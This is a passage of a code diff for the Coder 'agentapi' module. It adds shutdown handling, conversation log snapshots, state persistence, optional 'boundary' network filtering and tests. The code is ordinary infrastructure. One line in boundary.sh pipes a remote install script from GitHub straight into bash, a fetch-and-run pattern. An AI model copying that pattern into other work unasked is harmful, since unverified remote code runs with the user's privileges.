+        content: libScript,
+      });
+      await writeExecutable({
+        containerId: id,
+        filePath: "/tmp/shutdown.sh",
+        content: shutdownScript,
+      });
+      const result = await execContainer(id, [
+        "bash",
+        "-c",
+        `ARG_TASK_ID=test-task ARG_AGENTAPI_PORT=3284 ARG_MODULE_DIR_NAME=${moduleDirName} ARG_ENABLE_STATE_PERSISTENCE=true CODER_AGENT_URL=http://localhost:18080 CODER_AGENT_TOKEN=test-token /tmp/shutdown.sh`,
+      ]);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Sending SIGUSR1 to AgentAPI");
+      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
+    });
+
+    test("skips SIGUSR1 when no PID file available", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      await setupMocks(id, "normal", 204);
+      // No pidFilePath and no MODULE_DIR_NAME, so no PID file can be resolved.
+      const result = await runShutdownScript(id, "test-task", "", "false");
+
+      expect(result.exitCode).toBe(0);
+      // Should not send SIGUSR1 or SIGTERM (no PID to signal).
+      expect(result.stdout).not.toContain("Sending SIGUSR1");
+      expect(result.stdout).not.toContain("Sending SIGTERM");
+      expect(result.stdout).toContain("Shutdown complete");
+    });
+
+    test("skips SIGUSR1 when state persistence disabled", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      const pidFile = "/tmp/agentapi-test.pid";
+      await setupMocks(id, "normal", 204, pidFile);
+      // PID file exists but state persistence is disabled.
+      const result = await runShutdownScript(id, "test-task", pidFile, "false");
+
+      expect(result.exitCode).toBe(0);
+      // Should NOT send SIGUSR1 (persistence disabled).
+      expect(result.stdout).not.toContain("Sending SIGUSR1");
+      // Should still send SIGTERM (graceful shutdown always happens).
+      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
+    });
+  });
+
+  describe("boundary", async () => {
+    test("boundary-disabled-by-default", async () => {
+      const { id } = await setup();
+      await execModuleScript(id);
+      await expectAgentAPIStarted(id);
+      // Config file should NOT exist when boundary is disabled
+      const configCheck = await execContainer(id, [
+        "bash",
+        "-c",
+        "test -f /home/coder/.config/coder_boundary/config.yaml && echo exists || echo missing",
+      ]);
+      expect(configCheck.stdout.trim()).toBe("missing");
+      // AGENTAPI_BOUNDARY_PREFIX should NOT be in the mock log
+      const mockLog = await readFileContainer(
+        id,
+        "/home/coder/agentapi-mock.log",
+      );
+      expect(mockLog).not.toContain("AGENTAPI_BOUNDARY_PREFIX:");
+    });
+
+    test("boundary-enabled", async () => {
+      const { id } = await setup({
+        moduleVariables: {
+          enable_boundary: "true",
+          boundary_config_path: "/tmp/test-boundary.yaml",
+        },
+      });
+      // Write boundary config to the path before running the module
+      await execContainer(id, [
+        "bash",
+        "-c",
+        `cat > /tmp/test-boundary.yaml <<'EOF'
+jail_type: landjail
+proxy_port: 8087
+log_level: warn
+allowlist:
+  - "domain=api.example.com"
+EOF`,
+      ]);
+      // Add mock coder binary for boundary setup
+      await writeExecutable({
+        containerId: id,
+        filePath: "/usr/bin/coder",
+        content: `#!/bin/bash
+if [ "$1" = "boundary" ]; then
+ shift; shift; exec "$@"
+fi
+echo "mock coder"`,
+      });
+      await execModuleScript(id);
+      await expectAgentAPIStarted(id);
+      // Verify the config file exists at the specified path
+      const config = await readFileContainer(id, "/tmp/test-boundary.yaml");
+      expect(config).toContain("jail_type: landjail");
+      expect(config).toContain("proxy_port: 8087");
+      expect(config).toContain("domain=api.example.com");
+      // AGENTAPI_BOUNDARY_PREFIX should be exported
+      const mockLog = await readFileContainer(
+        id,
+        "/home/coder/agentapi-mock.log",
+      );
+      expect(mockLog).toContain("AGENTAPI_BOUNDARY_PREFIX:");
+      // E2E: start script should have used the wrapper
+      const startLog = await readFileContainer(
+        id,
+        "/home/coder/test-agentapi-start.log",
+      );
+      expect(startLog).toContain("Starting with boundary:");
+    });
+
+    test("boundary-enabled-no-coder-binary", async () => {
+      const { id } = await setup({
+        moduleVariables: {
+          enable_boundary: "true",
+          boundary_config_path: "/tmp/test-boundary.yaml",
+        },
+      });
+      // Write boundary config
+      await execContainer(id, [
+        "bash",
+        "-c",
+        `cat > /tmp/test-boundary.yaml <<'EOF'
+jail_type: landjail
+proxy_port: 8087
+log_level: warn
+EOF`,
+      ]);
+      // Remove coder binary to simulate it not being available
+      await execContainer(
+        id,
+        [
+          "bash",
+          "-c",
+          "rm -f /usr/bin/coder /usr/local/bin/coder 2>/dev/null; hash -r",
+        ],
+        ["--user", "root"],
+      );
+      const resp = await execModuleScript(id);
+      // Script should fail because coder binary is required
+      expect(resp.exitCode).not.toBe(0);
+      const scriptLog = await readFileContainer(id, "/home/coder/script.log");
+      expect(scriptLog).toContain("Boundary cannot be enabled");
+    });
+  });
 });

registry/coder/modules/agentapi/main.tf

@@ -4,7 +4,7 @@ terraform {
   required_providers {
     coder = {
       source  = "coder/coder"
-      version = ">= 2.12"
+      version = ">= 2.13"
     }
   }
 }
@@ -18,6 +18,8 @@ data "coder_workspace" "me" {}
 
 data "coder_workspace_owner" "me" {}
 
+data "coder_task" "me" {}
+
 variable "web_app_order" {
   type        = number
   description = "The order determines the position of app in the UI presentation. The lowest order is shown first and apps with equal order are sorted by name (ascending order)."
@@ -126,6 +128,12 @@ variable "agentapi_port" {
   default     = 3284
 }
 
+variable "task_log_snapshot" {
+  type        = bool
+  description = "Capture last 10 messages when workspace stops for offline viewing while task is paused."
+  default     = true
+}
+
 locals {
   # agentapi_subdomain_false_min_version_expr matches a semantic version >= v0.3.3.
   # Initial support was added in v0.3.1 but configuration via environment variable
@@ -156,6 +164,60 @@ variable "module_dir_name" {
   description = "Name of the subdirectory in the home directory for module files."
 }
 
+variable "enable_boundary" {
+  type        = bool
+  description = "Enable coder boundary for network filtering. Requires boundary_config to be set."
+  default     = false
+}
+
+variable "boundary_config_path" {
+  type        = string
+  description = "Path to boundary config.yaml inside the workspace. If provided, exposed as BOUNDARY_CONFIG env var."
+  default     = ""
+}
+
+variable "boundary_version" {
+  type        = string
+  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release. When compile_boundary_from_source is true, a valid git reference should be provided (tag, commit, branch)."
+  default     = "latest"
+}
+
+variable "compile_boundary_from_source" {
+  type        = bool
+  description = "Whether to compile boundary from source instead of using the official install script."
+  default     = false
+}
+
+variable "use_boundary_directly" {
+  type        = bool
+  description = "Whether to use boundary binary directly instead of coder boundary subcommand. When false (default), uses coder boundary subcommand. When true, installs and uses boundary binary from release."
+  default     = false
+}
+
+variable "enable_state_persistence" {
+  type        = bool
+  description = "Enable AgentAPI conversation state persistence across restarts."
+  default     = false
+}
+
+variable "state_file_path" {
+  type        = string
+  description = "Path to the AgentAPI state file. Defaults to $HOME/<module_dir_name>/agentapi-state.json."
+  default     = ""
+}
+
+variable "pid_file_path" {
+  type        = string
+  description = "Path to the AgentAPI PID file. Defaults to $HOME/<module_dir_name>/agentapi.pid."
+  default     = ""
+}
+
+resource "coder_env" "boundary_config" {
+  count    = var.enable_boundary && var.boundary_config_path != "" ? 1 : 0
+  agent_id = var.agent_id
+  name     = "BOUNDARY_CONFIG"
+  value    = var.boundary_config_path
+}
 
 locals {
   # we always trim the slash for consistency
@@ -173,6 +235,9 @@ locals {
   //     for backward compatibility.
   agentapi_chat_base_path = var.agentapi_subdomain ? "" : "/@${data.coder_workspace_owner.me.name}/${data.coder_workspace.me.name}.${var.agent_id}/apps/${var.web_app_slug}/chat"
   main_script             = file("${path.module}/scripts/main.sh")
+  shutdown_script         = file("${path.module}/scripts/agentapi-shutdown.sh")
+  lib_script              = file("${path.module}/scripts/lib.sh")
+  boundary_script         = file("${path.module}/scripts/boundary.sh")
 }
 
 resource "coder_script" "agentapi" {
@@ -186,6 +251,10 @@ resource "coder_script" "agentapi" {
 
     echo -n '${base64encode(local.main_script)}' | base64 -d > /tmp/main.sh
     chmod +x /tmp/main.sh
+    echo -n '${base64encode(local.lib_script)}' | base64 -d > /tmp/agentapi-lib.sh
+    
+    echo -n '${base64encode(local.boundary_script)}' | base64 -d > /tmp/agentapi-boundary.sh
+    chmod +x /tmp/agentapi-boundary.sh
 
     ARG_MODULE_DIR_NAME='${var.module_dir_name}' \
     ARG_WORKDIR="$(echo -n '${base64encode(local.workdir)}' | base64 -d)" \
@@ -198,11 +267,43 @@ resource "coder_script" "agentapi" {
     ARG_POST_INSTALL_SCRIPT="$(echo -n '${local.encoded_post_install_script}' | base64 -d)" \
     ARG_AGENTAPI_PORT='${var.agentapi_port}' \
     ARG_AGENTAPI_CHAT_BASE_PATH='${local.agentapi_chat_base_path}' \
+    ARG_TASK_ID='${try(data.coder_task.me.id, "")}' \
+    ARG_TASK_LOG_SNAPSHOT='${var.task_log_snapshot}' \
+    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
+    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
+    ARG_COMPILE_BOUNDARY_FROM_SOURCE='${var.compile_boundary_from_source}' \
+    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
+    ARG_ENABLE_STATE_PERSISTENCE='${var.enable_state_persistence}' \
+    ARG_STATE_FILE_PATH='${var.state_file_path}' \
+    ARG_PID_FILE_PATH='${var.pid_file_path}' \
     /tmp/main.sh
     EOT
   run_on_start = true
 }
 
+resource "coder_script" "agentapi_shutdown" {
+  agent_id     = var.agent_id
+  display_name = "AgentAPI Shutdown"
+  icon         = var.web_app_icon
+  run_on_stop  = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o pipefail
+
+    echo -n '${base64encode(local.shutdown_script)}' | base64 -d > /tmp/agentapi-shutdown.sh
+    chmod +x /tmp/agentapi-shutdown.sh
+    echo -n '${base64encode(local.lib_script)}' | base64 -d > /tmp/agentapi-lib.sh
+
+    ARG_TASK_ID='${try(data.coder_task.me.id, "")}' \
+    ARG_TASK_LOG_SNAPSHOT='${var.task_log_snapshot}' \
+    ARG_AGENTAPI_PORT='${var.agentapi_port}' \
+    ARG_ENABLE_STATE_PERSISTENCE='${var.enable_state_persistence}' \
+    ARG_MODULE_DIR_NAME='${var.module_dir_name}' \
+    ARG_PID_FILE_PATH='${var.pid_file_path}' \
+    /tmp/agentapi-shutdown.sh
+    EOT
+}
+
 resource "coder_app" "agentapi_web" {
   slug         = var.web_app_slug
   display_name = var.web_app_display_name

registry/coder/modules/agentapi/scripts/agentapi-shutdown.sh

@@ -0,0 +1,261 @@
+#!/usr/bin/env bash
+# AgentAPI shutdown script.
+#
+# Performs a graceful shutdown of AgentAPI: sends SIGUSR1 to trigger state save,
+# captures the last 10 messages as a log snapshot posted to the Coder instance,
+# then sends SIGTERM for graceful termination.
+
+set -euo pipefail
+
+# Configuration (set via Terraform interpolation).
+readonly TASK_ID="${ARG_TASK_ID:-}"
+readonly TASK_LOG_SNAPSHOT="${ARG_TASK_LOG_SNAPSHOT:-true}"
+readonly AGENTAPI_PORT="${ARG_AGENTAPI_PORT:-3284}"
+readonly ENABLE_STATE_PERSISTENCE="${ARG_ENABLE_STATE_PERSISTENCE:-false}"
+readonly MODULE_DIR_NAME="${ARG_MODULE_DIR_NAME:-}"
+readonly PID_FILE_PATH="${ARG_PID_FILE_PATH:-${MODULE_DIR_NAME:+$HOME/$MODULE_DIR_NAME/agentapi.pid}}"
+
+# Source shared utilities (written by the coder_script wrapper).
+# shellcheck source=lib.sh
+source /tmp/agentapi-lib.sh
+
+# Runtime environment variables.
+readonly CODER_AGENT_URL="${CODER_AGENT_URL:-}"
+readonly CODER_AGENT_TOKEN="${CODER_AGENT_TOKEN:-}"
+
+# Constants.
+readonly MAX_PAYLOAD_SIZE=65536    # 64KB
+readonly MAX_MESSAGE_CONTENT=57344 # 56KB
+readonly MAX_MESSAGES=10
+readonly FETCH_TIMEOUT=10
+readonly POST_TIMEOUT=10
+
+log() {
+  echo "$*"
+}
+
+error() {
+  echo "Error: $*" >&2
+}
+
+fetch_and_build_messages_payload() {
+  local payload_file="$1"
+  local messages_url="http://localhost:${AGENTAPI_PORT}/messages"
+
+  log "Fetching messages from AgentAPI on port $AGENTAPI_PORT"
+
+  if ! curl -fsSL --max-time "$FETCH_TIMEOUT" "$messages_url" > "$payload_file"; then
+    error "Failed to fetch messages from AgentAPI (may not be running)"
+    return 1
+  fi
+
+  # Update messages field to keep only last N messages.
+  if ! jq --argjson n "$MAX_MESSAGES" '.messages |= .[-$n:]' < "$payload_file" > "${payload_file}.tmp"; then
+    error "Failed to select last $MAX_MESSAGES messages"
+    return 1
+  fi
+  mv "${payload_file}.tmp" "$payload_file"
+
+  return 0
+}
+
+truncate_messages_payload_to_size() {
+  local payload_file="$1"
+  local max_size="$2"
+
+  while true; do
+    local size
+    size=$(wc -c < "$payload_file")
+
+    if ((size <= max_size)); then
+      break
+    fi
+
+    local count
+    count=$(jq '.messages | length' < "$payload_file")
+
+    if ((count == 1)); then
+      # Down to last message, truncate its content keeping the tail.
+      log "Payload size $size bytes exceeds limit, truncating final message content"
+
+      # Keep tail of content with truncation indicator, leaving room for JSON
+      # overhead.
+      if ! jq --argjson maxlen "$MAX_MESSAGE_CONTENT" '.messages[0].content |= (if length > $maxlen then "[...content truncated, showing last 56KB...]\n\n" + .[-$maxlen:] else . end)' < "$payload_file" > "${payload_file}.tmp"; then
+        error "Failed to truncate message content"
+        return 1
+      fi
+      mv "${payload_file}.tmp" "$payload_file"
+
+      # Verify the truncation was sufficient.
+      size=$(wc -c < "$payload_file")
+      if ((size > max_size)); then
+        error "Payload still too large after content truncation, giving up"
+        return 1
+      fi
+      break
+    else
+      # More than one message, remove the oldest.
+      log "Payload size $size bytes exceeds limit, removing oldest message"
+
+      if ! jq '.messages |= .[1:]' < "$payload_file" > "${payload_file}.tmp"; then
+        error "Failed to remove oldest message"
+        return 1
+      fi
+      mv "${payload_file}.tmp" "$payload_file"
+    fi
+  done
+
+  return 0
+}
+
+post_task_log_snapshot() {
+  local payload_file="$1"
+  local tmpdir="$2"
+
+  local snapshot_url="${CODER_AGENT_URL}/api/v2/workspaceagents/me/tasks/${TASK_ID}/log-snapshot?format=agentapi"
+  local response_file="${tmpdir}/response.txt"
+
+  log "Posting log snapshot to Coder instance"
+
+  local http_code
+  if ! http_code=$(curl -sS -w "%{http_code}" -o "$response_file" \
+    --max-time "$POST_TIMEOUT" \
+    -X POST "$snapshot_url" \
+    -H "Coder-Session-Token: $CODER_AGENT_TOKEN" \
+    -H "Content-Type: application/json" \
+    --data-binary "@$payload_file"); then
+    error "Failed to connect to Coder instance (curl failed)"
+    return 1
+  fi
+
+  if [[ $http_code == 204 ]]; then
+    log "Log snapshot posted successfully"
+    return 0
+  elif [[ $http_code == 404 ]]; then
+    log "Log snapshot endpoint not supported by this Coder version, skipping"
+    return 0
+  else
+    local response
+    response=$(cat "$response_file" 2> /dev/null || echo "")
+    error "Failed to post log snapshot (HTTP $http_code): $response"
+    return 1
+  fi
+}
+
+capture_task_log_snapshot() {
+  if [[ -z $TASK_ID ]]; then
+    log "No task ID, skipping log snapshot"
+    return 0
+  fi
+
+  if [[ -z $CODER_AGENT_URL ]]; then
+    error "CODER_AGENT_URL not set, cannot capture log snapshot"
+    return 1
+  fi
+
+  if [[ -z $CODER_AGENT_TOKEN ]]; then
+    error "CODER_AGENT_TOKEN not set, cannot capture log snapshot"
+    return 1
+  fi
+
+  if ! command -v jq > /dev/null 2>&1; then
+    error "jq not found, cannot capture log snapshot"
+    return 1
+  fi
+
+  if ! command -v curl > /dev/null 2>&1; then
+    error "curl not found, cannot capture log snapshot"
+    return 1
+  fi
+
+  # Not local, must be visible to the EXIT trap after the function returns.
+  tmpdir=$(mktemp -d)
+  trap 'trap - EXIT; rm -rf "$tmpdir"' EXIT
+
+  local payload_file="${tmpdir}/payload.json"
+
+  if ! fetch_and_build_messages_payload "$payload_file"; then
+    error "Cannot capture log snapshot without messages"
+    return 1
+  fi
+
+  local message_count
+  message_count=$(jq '.messages | length' < "$payload_file")
+  if ((message_count == 0)); then
+    log "No messages for log snapshot"
+    return 0
+  fi
+
+  log "Retrieved $message_count messages for log snapshot"
+
+  # Ensure payload fits within size limit.
+  if ! truncate_messages_payload_to_size "$payload_file" "$MAX_PAYLOAD_SIZE"; then
+    error "Failed to truncate payload to size limit"
+    return 1
+  fi
+
+  local final_size final_count
+  final_size=$(wc -c < "$payload_file")
+  final_count=$(jq '.messages | length' < "$payload_file")
+  log "Log snapshot payload: $final_size bytes, $final_count messages"
+
+  if ! post_task_log_snapshot "$payload_file" "$tmpdir"; then
+    error "Log snapshot capture failed"
+    return 1
+  fi
+}
+
+main() {
+  log "Shutting down AgentAPI"
+
+  local agentapi_pid=
+  if [[ -n $PID_FILE_PATH ]]; then
+    agentapi_pid=$(cat "$PID_FILE_PATH" 2> /dev/null || echo "")
+  fi
+
+  # State persistence is only enabled when the binary supports it (>= v0.12.0).
+  # The default SIGUSR1 disposition on Linux is terminate, so sending it to an
+  # older binary would kill the process.
+  local state_persistence=0
+  if [[ $ENABLE_STATE_PERSISTENCE == true ]] && version_at_least 0.12.0 "$(agentapi_version)"; then
+    state_persistence=1
+  fi
+
+  # Trigger state save via SIGUSR1 (saves without exiting).
+  if ((state_persistence)) && [[ -n $agentapi_pid ]] && kill -0 "$agentapi_pid" 2> /dev/null; then
+    log "Sending SIGUSR1 to AgentAPI (pid $agentapi_pid) to save state"
+    kill -USR1 "$agentapi_pid" || true
+    # Allow time for state save to complete before proceeding.
+    sleep 1
+  fi
+
+  # Capture log snapshot for task history.
+  if [[ $TASK_LOG_SNAPSHOT == true ]]; then
+    # Subshell scopes the EXIT trap (tmpdir cleanup) inside
+    # capture_task_log_snapshot and preserves set -e, which
+    # || would otherwise disable for the function body.
+    (capture_task_log_snapshot) || log "Log snapshot capture failed, continuing shutdown"
+  else
+    log "Log snapshot disabled, skipping"
+  fi
+
+  # Graceful termination.
+  if [[ -n $agentapi_pid ]] && kill -0 "$agentapi_pid" 2> /dev/null; then
+    log "Sending SIGTERM to AgentAPI (pid $agentapi_pid)"
+    kill -TERM "$agentapi_pid" 2> /dev/null || true
+
+    # Wait for process to exit to guarantee a clean shutdown.
+    local elapsed=0
+    while kill -0 "$agentapi_pid" 2> /dev/null; do
+      sleep 1
+      ((elapsed++)) || true
+      if ((elapsed % 5 == 0)); then
+        log "Warning: AgentAPI (pid $agentapi_pid) still running after ${elapsed}s"
+      fi
+    done
+  fi
+
+  log "Shutdown complete"
+}
+
+main "$@"

registry/coder/modules/agentapi/scripts/agentapi-wait-for-start.sh

@@ -3,20 +3,22 @@ set -o errexit
 set -o pipefail
 
 port=${1:-3284}
+max_attempts=150
 
-# This script waits for the agentapi server to start on port 3284.
+# This script waits for the agentapi server to start on the given port.
+# Each attempt sleeps 0.1s, so 150 attempts ≈ 15 seconds.
 # It considers the server started after 3 consecutive successful responses.
 
 agentapi_started=false
 
 echo "Waiting for agentapi server to start on port $port..."
-for i in $(seq 1 150); do
+for i in $(seq 1 "$max_attempts"); do
   for j in $(seq 1 3); do
     sleep 0.1
     if curl -fs -o /dev/null "http://localhost:$port/status"; then
       echo "agentapi response received ($j/3)"
     else
-      echo "agentapi server not responding ($i/15)"
+      echo "agentapi server not responding ($i/$max_attempts)"
       continue 2
     fi
   done
@@ -25,7 +27,7 @@ for i in $(seq 1 150); do
 done
 
 if [ "$agentapi_started" != "true" ]; then
-  echo "Error: agentapi server did not start on port $port after 15 seconds."
+  echo "Error: agentapi server did not start on port $port after $max_attempts attempts."
   exit 1
 fi
 

registry/coder/modules/agentapi/scripts/boundary.sh

@@ -0,0 +1,95 @@
+#!/bin/bash
+# boundary.sh - Boundary installation and setup for agentapi module.
+# Sourced by main.sh when ENABLE_BOUNDARY=true.
+# Exports AGENTAPI_BOUNDARY_PREFIX for use by module start scripts.
+
+validate_boundary_subcommand() {
+  if command_exists coder; then
+    if coder boundary --help > /dev/null 2>&1; then
+      return 0
+    else
+      echo "Error: 'coder' command found but does not support 'boundary' subcommand. Please enable install_boundary."
+      exit 1
+    fi
+  else
+    echo "Error: ENABLE_BOUNDARY=true, but 'coder' command not found. Boundary cannot be enabled." >&2
+    exit 1
+  fi
+}
+
+# Install boundary binary if needed.
+# Uses one of three strategies:
+#   1. Compile from source (compile_boundary_from_source=true)
+#   2. Install from release (use_boundary_directly=true)
+#   3. Use coder boundary subcommand (default, no installation needed)
+install_boundary() {
+  if [ "${COMPILE_BOUNDARY_FROM_SOURCE}" = "true" ]; then
+    echo "Compiling boundary from source (version: ${BOUNDARY_VERSION})"
+
+    # Remove existing boundary directory to allow re-running safely
+    if [ -d boundary ]; then
+      rm -rf boundary
+    fi
+
+    echo "Cloning boundary repository"
+    git clone https://github.com/coder/boundary.git
+    cd boundary || exit 1
+    git checkout "${BOUNDARY_VERSION}"
+
+    make build
+
+    sudo cp boundary /usr/local/bin/
+    sudo chmod +x /usr/local/bin/boundary
+    cd - || exit 1
+  elif [ "${USE_BOUNDARY_DIRECTLY}" = "true" ]; then
+    echo "Installing boundary using official install script (version: ${BOUNDARY_VERSION})"
+    curl -fsSL https://raw.githubusercontent.com/coder/boundary/main/install.sh | bash -s -- --version "${BOUNDARY_VERSION}"
+  else
+    validate_boundary_subcommand
+    echo "Using coder boundary subcommand (provided by Coder)"
+  fi
+}
+
+# Set up boundary: install, write config, create wrapper script.
+# Exports AGENTAPI_BOUNDARY_PREFIX pointing to the wrapper script.
+setup_boundary() {
+  local module_path="$1"
+
+  echo "Setting up coder boundary..."
+
+  # Install boundary binary if needed
+  install_boundary
+
+  # Determine which boundary command to use and create wrapper script
+  BOUNDARY_WRAPPER_SCRIPT="$module_path/boundary-wrapper.sh"
+
+  if [ "${COMPILE_BOUNDARY_FROM_SOURCE}" = "true" ] || [ "${USE_BOUNDARY_DIRECTLY}" = "true" ]; then
+    # Use boundary binary directly (from compilation or release installation)
+    cat > "${BOUNDARY_WRAPPER_SCRIPT}" << 'WRAPPER_EOF'
+#!/usr/bin/env bash
+set -euo pipefail
+exec boundary -- "$@"
+WRAPPER_EOF
+  else
+    # Use coder boundary subcommand (default)
+    # Copy coder binary to strip CAP_NET_ADMIN capabilities.
+    # This is necessary because boundary doesn't work with privileged binaries
+    # (you can't launch privileged binaries inside network namespaces unless
+    # you have sys_admin).
+    CODER_NO_CAPS="$module_path/coder-no-caps"
+    if ! cp "$(which coder)" "$CODER_NO_CAPS"; then
+      echo "Error: Failed to copy coder binary to ${CODER_NO_CAPS}. Boundary cannot be enabled." >&2
+      exit 1
+    fi
+    cat > "${BOUNDARY_WRAPPER_SCRIPT}" << 'WRAPPER_EOF'
+#!/usr/bin/env bash
+set -euo pipefail
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+exec "${SCRIPT_DIR}/coder-no-caps" boundary -- "$@"
+WRAPPER_EOF
+  fi
+
+  chmod +x "${BOUNDARY_WRAPPER_SCRIPT}"
+  export AGENTAPI_BOUNDARY_PREFIX="${BOUNDARY_WRAPPER_SCRIPT}"
+  echo "Boundary wrapper configured: ${AGENTAPI_BOUNDARY_PREFIX}"
+}

registry/coder/modules/agentapi/scripts/lib.sh

@@ -0,0 +1,45 @@
+#!/usr/bin/env bash
+# Shared utility functions for agentapi module scripts.
+
+# version_at_least checks if an actual version meets a minimum requirement.
+# Non-semver strings (e.g. "latest", custom builds) always pass.
+# Usage: version_at_least <minimum> <actual>
+#   version_at_least v0.12.0 v0.10.0  # returns 1 (false)
+#   version_at_least v0.12.0 v0.12.0  # returns 0 (true)
+#   version_at_least v0.12.0 latest   # returns 0 (true)
+version_at_least() {
+  local min="${1#v}"
+  local actual="${2#v}"
+
+  # Non-semver versions pass through (e.g. "latest", custom builds).
+  if ! [[ $actual =~ ^([0-9]+)\.([0-9]+)\.([0-9]+)$ ]]; then
+    return 0
+  fi
+
+  local act_major="${BASH_REMATCH[1]}"
+  local act_minor="${BASH_REMATCH[2]}"
+  local act_patch="${BASH_REMATCH[3]}"
+
+  [[ $min =~ ^([0-9]+)\.([0-9]+)\.([0-9]+)$ ]] || return 0
+
+  local min_major="${BASH_REMATCH[1]}"
+  local min_minor="${BASH_REMATCH[2]}"
+  local min_patch="${BASH_REMATCH[3]}"
+
+  # Arithmetic expressions set exit status: 0 (true) if non-zero, 1 (false) if zero.
+  if ((act_major != min_major)); then
+    ((act_major > min_major))
+    return
+  fi
+  if ((act_minor != min_minor)); then
+    ((act_minor > min_minor))
+    return
+  fi
+  ((act_patch >= min_patch))
+}
+
+# agentapi_version returns the installed agentapi binary version (e.g. "0.11.8").
+# Returns empty string if the binary is missing or doesn't support --version.
+agentapi_version() {
+  agentapi --version 2> /dev/null | awk '{print $NF}'
+}

registry/coder/modules/agentapi/scripts/main.sh

@@ -14,8 +14,20 @@ WAIT_FOR_START_SCRIPT="$ARG_WAIT_FOR_START_SCRIPT"
 POST_INSTALL_SCRIPT="$ARG_POST_INSTALL_SCRIPT"
 AGENTAPI_PORT="$ARG_AGENTAPI_PORT"
 AGENTAPI_CHAT_BASE_PATH="${ARG_AGENTAPI_CHAT_BASE_PATH:-}"
+TASK_ID="${ARG_TASK_ID:-}"
+TASK_LOG_SNAPSHOT="${ARG_TASK_LOG_SNAPSHOT:-true}"
+ENABLE_BOUNDARY="${ARG_ENABLE_BOUNDARY:-false}"
+BOUNDARY_VERSION="${ARG_BOUNDARY_VERSION:-latest}"
+COMPILE_BOUNDARY_FROM_SOURCE="${ARG_COMPILE_BOUNDARY_FROM_SOURCE:-false}"
+USE_BOUNDARY_DIRECTLY="${ARG_USE_BOUNDARY_DIRECTLY:-false}"
+ENABLE_STATE_PERSISTENCE="${ARG_ENABLE_STATE_PERSISTENCE:-false}"
+STATE_FILE_PATH="${ARG_STATE_FILE_PATH:-}"
+PID_FILE_PATH="${ARG_PID_FILE_PATH:-}"
 set +o nounset
 
+# shellcheck source=lib.sh
+source /tmp/agentapi-lib.sh
+
 command_exists() {
   command -v "$1" > /dev/null 2>&1
 }
@@ -23,6 +35,13 @@ command_exists() {
 module_path="$HOME/${MODULE_DIR_NAME}"
 mkdir -p "$module_path/scripts"
 
+# Check for jq dependency if task log snapshot is enabled.
+if [[ $TASK_LOG_SNAPSHOT == true ]] && [[ -n $TASK_ID ]]; then
+  if ! command_exists jq; then
+    echo "Warning: jq is not installed. Task log snapshot requires jq to capture conversation history."
+    echo "Install jq to enable log snapshot functionality when the workspace stops."
+  fi
+fi
 if [ ! -d "${WORKDIR}" ]; then
   echo "Warning: The specified folder '${WORKDIR}' does not exist."
   echo "Creating the folder..."
@@ -94,8 +113,30 @@ export LC_ALL=en_US.UTF-8
 
 cd "${WORKDIR}"
 
+# Set up boundary if enabled
+export AGENTAPI_BOUNDARY_PREFIX=""
+if [ "${ENABLE_BOUNDARY}" = "true" ]; then
+  # shellcheck source=boundary.sh
+  source /tmp/agentapi-boundary.sh
+  setup_boundary "$module_path"
+fi
+
 export AGENTAPI_CHAT_BASE_PATH="${AGENTAPI_CHAT_BASE_PATH:-}"
 # Disable host header check since AgentAPI is proxied by Coder (which does its own validation)
 export AGENTAPI_ALLOWED_HOSTS="*"
+
+export AGENTAPI_PID_FILE="${PID_FILE_PATH:-$module_path/agentapi.pid}"
+# Only set state env vars when persistence is enabled and the binary supports
+# it. State persistence requires agentapi >= v0.12.0.
+if [ "${ENABLE_STATE_PERSISTENCE}" = "true" ]; then
+  actual_version=$(agentapi_version)
+  if version_at_least 0.12.0 "$actual_version"; then
+    export AGENTAPI_STATE_FILE="${STATE_FILE_PATH:-$module_path/agentapi-state.json}"
+    export AGENTAPI_SAVE_STATE="true"
+    export AGENTAPI_LOAD_STATE="true"
+  else
+    echo "Warning: State persistence requires agentapi >= v0.12.0 (current: ${actual_version:-unknown}), skipping."
+  fi
+fi
 nohup "$module_path/scripts/agentapi-start.sh" true "${AGENTAPI_PORT}" &> "$module_path/agentapi-start.log" &
 "$module_path/scripts/agentapi-wait-for-start.sh" "${AGENTAPI_PORT}"

registry/coder/modules/agentapi/testdata/agentapi-mock-shutdown.js

@@ -0,0 +1,102 @@
+#!/usr/bin/env node
+// Mock AgentAPI server for shutdown script tests.
+// Usage: MESSAGES='[...]' node agentapi-mock-shutdown.js [port]
+
+const http = require("http");
+const fs = require("fs");
+const port = process.argv[2] || 3284;
+
+// Write PID file for shutdown script.
+if (process.env.AGENTAPI_PID_FILE) {
+  const path = require("path");
+  fs.mkdirSync(path.dirname(process.env.AGENTAPI_PID_FILE), {
+    recursive: true,
+  });
+  fs.writeFileSync(process.env.AGENTAPI_PID_FILE, String(process.pid));
+}
+
+// Handle SIGUSR1 (state save signal from shutdown script).
+process.on("SIGUSR1", () => {
+  fs.writeFileSync(
+    "/tmp/sigusr1-received",
+    `SIGUSR1 received at ${Date.now()}\n`,
+  );
+});
+
+// Parse messages from environment or use default
+let messages = [];
+if (process.env.MESSAGES) {
+  try {
+    messages = JSON.parse(process.env.MESSAGES);
+  } catch (e) {
+    console.error("Failed to parse MESSAGES env var:", e.message);
+    process.exit(1);
+  }
+}
+
+// Presets for common test scenarios
+if (process.env.PRESET === "normal") {
+  messages = [
+    { id: 1, type: "input", content: "Hello", time: "2025-01-01T00:00:00Z" },
+    {
+      id: 2,
+      type: "output",
+      content: "Hi there",
+      time: "2025-01-01T00:00:01Z",
+    },
+    {
+      id: 3,
+      type: "input",
+      content: "How are you?",
+      time: "2025-01-01T00:00:02Z",
+    },
+    {
+      id: 4,
+      type: "output",
+      content: "Good!",
+      time: "2025-01-01T00:00:03Z",
+    },
+    { id: 5, type: "input", content: "Great", time: "2025-01-01T00:00:04Z" },
+  ];
+} else if (process.env.PRESET === "many") {
+  messages = Array.from({ length: 15 }, (_, i) => ({
+    id: i + 1,
